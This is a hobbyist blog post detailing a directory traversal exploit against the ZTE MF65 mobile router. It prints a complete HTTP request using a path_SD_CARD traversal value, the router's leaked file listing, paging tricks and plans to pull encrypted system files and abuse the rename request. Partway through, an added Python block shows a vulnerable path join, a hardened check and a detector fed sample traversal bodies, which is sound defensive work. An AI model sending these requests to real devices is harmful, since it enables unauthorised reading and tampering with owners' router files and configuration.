Sunday 5 June 2016

///Zte MF65 local file listing/include exploits///

hey guys, back again with another quickie but goodie.
I've been searching for any trace of the internal filesystem of this router by every method of LFI I could think of, and I was lured to the HTTP share page. This is the page used to upload files onto the SD card, and judging by the requests it makes it seems to be locked to the mmc2 path; the paths are set in the httpshare files
(off the top of my head they are in the tmpl/sd path and in the js path).
The HTTP share page uses a directory check to obtain a listing of the files in that directory (mmc2). By changing the check queries we end up with a few local file listing includes and a few local file includes.
We are using XML requests via your favourite request launcher (nc, curl, Burp, whatever).

using:

POST /goform/goform_set_cmd_process HTTP/1.1
Host: 192.165.0.1
User-Agent: your own uA
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://--your ip --/index.html
Content-Length: 75
Connection: close

isTest=false&goformId=HTTPSHARE_ENTERFOLD&path_SD_CARD=%2F..%2F&indexPage=1


we are using path_SD_CARD=%2F..%2F
(this param must be URL-encoded)
we can get listings from everywhere with this query
these are the results for the ./ path

which returns:

{"result":{"fileInfo":[{"fileName":".efs_private","attribute":"document","size":"0","lastUpdateTime":"315964800"},{"fileName":"1.txt","attribute":"file","size":"0","lastUpdateTime":"315964800"},{"fileName":"AUTORUN.FLG","attribute":"file","size":"0","lastUpdateTime":"315964800"},{"fileName":"Images","attribute":"document","size":"0","lastUpdateTime":"315964800"},{"fileName":"KEEPRNDISDBG.FLG","attribute":"file","size":"4","lastUpdateTime":"315964800"},{"fileName":"NODOWNLOAD.FLG","attribute":"file","size":"0","lastUpdateTime":"315964800"},{"fileName":"SWITCH.TMP","attribute":"file","size":"34","lastUpdateTime":"315964800"},{"fileName":"TCARD_SHARE","attribute":"file","size":"32","lastUpdateTime":"315964800"},{"fileName":"UimEfsAPDULog.Txt","attribute":"file","size":"0","lastUpdateTime":"315964800"},{"fileName":"ZTEMODEM.ISO","attribute":"file","size":"5216256","lastUpdateTime":"315964800"}],"totalRecord":"25"}}
{"fileName":"config","attribute":"file","size":"20080","lastUpdateTime":"315964800"}],"totalRecord":"25"}}
{"fileName":"etc","attribute":"document","size":"0","lastUpdateTime":"315964800"},
{"fileName":"mmc2","attribute":"document","size":"0","lastUpdateTime":"0"},{"fileName":"mmgsdi","attribute":"document","size":"0","lastUpdateTime":"315964800"},{"fileName":"nv","attribute":"document","size":"0","lastUpdateTime":"315964800"},{"fileName":"nvconfig_debug","attribute":"file","size":"7840","lastUpdateTime":"315964800"},{"fileName":"nvm","attribute":"document","size":"0","lastUpdateTime":"315964800"},{"fileName":"pbm_phone_uid.dat","attribute":"file","size":"9","lastUpdateTime":"315964800"},{"fileName":"pdp_profiles","attribute":"document","size":"0","lastUpdateTime":"315964800"},{"fileName":"reset_cntr.bin","attribute":"file","size":"4","lastUpdateTime":"315964800"},{"fileName":"sms","attribute":"document","size":"0","lastUpdateTime":"315964800"}],
{"fileName":"storage.ds","attribute":"file","size":"32","lastUpdateTime":"315964800"},{"fileName":"test","attribute":"file","size":"0","lastUpdateTime":"315964800"},
{"fileName":"var","attribute":"document","size":"0","lastUpdateTime":"315964800"},{"fileName":"web","attribute":"document","size":"0","lastUpdateTime":"315964800"},{"fileName":"wificonfig","attribute":"document","size":"0","lastUpdateTime":"315964800"}],"totalRecord":"25"}}


the responses are capped at returning a max of 10ish files, but changing indexPage to 2 will load the next page of results.
notice the .efs_private file,
which hints that the fs is encrypted and extracted at run time. there are many keys inside the firmware provided by u_mob for the MF65, which is almost 100% the same filesystem except, of course, for the provider's changes; e.g. Telstra don't call their query key a lucky number any more, it's just _=(luckynumber)=(timeinseconds)
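From the defender's side, the bug above is a missing canonicalisation check on path_SD_CARD. Here is an added example (not code from this post or from ZTE's firmware) that shows the unchecked join beside a hardened version, plus a detector that flags request bodies whose decoded path escapes the share root; SHARE_ROOT, all function names and the sample bodies are assumptions constructed for the example.

```python
"""Added example: path check the HTTPSHARE_ENTERFOLD handler should apply,
and a detector for request bodies that try to walk out of the share root.
Assumed layout: shared files live under SHARE_ROOT (named after the mmc2
path in the post); values reach these functions already URL-decoded once."""
import os
from typing import Optional
from urllib.parse import parse_qs

SHARE_ROOT = "/mmc2"  # assumed share root for the example


def vulnerable_target(path_sd_card: str) -> str:
    # Behaviour the post describes: the decoded parameter is joined onto the
    # root with no anchoring check, so "/../" resolves to the parent of mmc2.
    return os.path.normpath(SHARE_ROOT + "/" + path_sd_card)


def safe_target(path_sd_card: str) -> Optional[str]:
    """Return the directory to list, or None if the request must be refused."""
    if "%" in path_sd_card or "\x00" in path_sd_card:
        # Leftover percent signs mean double encoding; NUL bytes truncate C paths.
        return None
    # Treat the value as relative to the root whatever it starts with, then
    # normalise lexically ("a/../b" -> "b"). If the root were a symlink tree,
    # os.path.realpath would also be needed; normpath keeps the example offline.
    candidate = os.path.normpath(os.path.join(SHARE_ROOT, path_sd_card.lstrip("/")))
    # Anchor check: the result must be the root itself or live strictly below it.
    if candidate != SHARE_ROOT and not candidate.startswith(SHARE_ROOT + "/"):
        return None
    return candidate


def flag_request(body: str) -> bool:
    """True when an HTTPSHARE_ENTERFOLD body carries a path that escapes the root."""
    params = parse_qs(body, keep_blank_values=True)  # performs the single decode
    if params.get("goformId") != ["HTTPSHARE_ENTERFOLD"]:
        return False
    return any(safe_target(p) is None for p in params.get("path_SD_CARD", []))


# Constructed sample bodies: the post's traversal, a benign listing of Images,
# and a traversal hidden behind a legitimate-looking first component.
SAMPLE_BODIES = [
    "isTest=false&goformId=HTTPSHARE_ENTERFOLD&path_SD_CARD=%2F..%2F&indexPage=1",
    "isTest=false&goformId=HTTPSHARE_ENTERFOLD&path_SD_CARD=Images&indexPage=1",
    "isTest=false&goformId=HTTPSHARE_ENTERFOLD&path_SD_CARD=Images%2F..%2F..%2Fetc&indexPage=1",
]


def flagged_bodies() -> list:
    """Bodies from SAMPLE_BODIES that the detector would alert on."""
    return [b for b in SAMPLE_BODIES if flag_request(b)]
```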

well, stay tuned as I pull the .efs_private and ZTEMODEM.ISO files


also, a quick trick is to change the names of uploaded files via the rename request to resolve a file in a place other than the mmc2 folder.
the rename query can also be used to change the names of files in other places using the same exploits; I'll get around to these as soon as I get the chance

till then guys, stay fucken sharp and don't trip over yourself :P
